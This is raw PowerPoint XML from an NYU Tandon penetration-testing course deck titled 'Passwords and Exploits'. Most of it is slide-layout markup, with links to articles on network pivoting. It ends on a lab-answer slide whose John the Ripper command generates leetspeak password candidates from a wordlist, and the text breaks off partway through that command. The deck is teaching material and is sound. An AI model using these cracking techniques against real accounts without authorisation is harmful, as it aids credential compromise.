              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="688975" indent="-231775">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1030288" indent="-225425">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="-225425">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="914400" indent="-225425" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:tabLst/>
              <a:defRPr>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169068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Title Content">
  <p:cSld name="Section Title Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;24;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9153525" cy="5157788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="570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 name="Google Shape;25;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315325" y="292100"/>
            <a:ext cx="1841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6" name="Google Shape;26;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759325" y="238125"/>
            <a:ext cx="1463675" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Google Shape;27;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997268" y="1583857"/>
            <a:ext cx="3737844" cy="3131018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="231775" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="3000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1" indent="-228600" algn="l" rtl="0">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1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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8" name="Google Shape;28;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5516189" y="4905375"/>
            <a:ext cx="2601707" cy="267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lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>©2021 NYU Tandon School of Engineering</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;29;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315325" y="292100"/>
            <a:ext cx="1841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0" name="Google Shape;30;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759325" y="238125"/>
            <a:ext cx="1463675" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Google Shape;31;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315325" y="292100"/>
            <a:ext cx="1841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2" name="Google Shape;32;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759325" y="238125"/>
            <a:ext cx="1463675" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Google Shape;33;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="4483100" cy="5157788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36268574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9144" y="0"/>
            <a:ext cx="9153144" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227752" y="1532443"/>
            <a:ext cx="3637261" cy="1811289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aria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3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227012" y="3718898"/>
            <a:ext cx="1783159" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1000" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194906536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3" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="921705"/>
            <a:ext cx="8572840" cy="3688132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="855663" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr>
                <a:latin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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2390053" y="75674"/>
            <a:ext cx="6527400" cy="586477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="2000" b="1"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8891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Section Title Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4480560" cy="5156574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997268" y="1583857"/>
            <a:ext cx="3737844" cy="3131018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="3000" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr baseline="0">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Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5261F6B8-A620-432C-8F4D-98FD7281C6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8315325" y="292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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDECC0E-F160-4FFF-B79D-344E0D731DA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59325" y="238125"/>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058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5" descr="nyu_white.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="230188" y="234950"/>
            <a:ext cx="673100" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9153525" cy="712788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="570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 name="Google Shape;12;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273050" y="238125"/>
            <a:ext cx="1463675" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;13;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3271146" y="4908239"/>
            <a:ext cx="2601707" cy="267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©2021 NYU Tandon School of Engineering</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1353510284"/>
      </p:ext>
    </p:extLst>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5.sv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amp;ehk=LxrAl9OUgcolpdj3X5QJfw&amp;r=0&amp;pid=OfficeInsert"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.sv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blog.elearnsecurity.com/nessus-and-metasploit-scan-networks-in-pivoting.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychain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Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1666105"/>
            <a:ext cx="3637261" cy="181128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rmAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NYU Cyber Fellows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>CS GY 6573</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Passwords and Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>©2020 NYU Tandon School of Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="512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338263"/>
            <a:ext cx="1465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2" y="1016836"/>
            <a:ext cx="4611189" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Spoiler ahead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4415C19D-F4E3-4DAB-BE8D-FCC9C2A55F1F}"/>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4894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John the Ripper - for password mangling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="921704"/>
            <a:ext cx="4401351" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Using our small seed file and john, use a rule that mangles the dictionary entries into various forms of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>leetspeak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>john --wordlist:./lab9.lst --rules:l33t --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
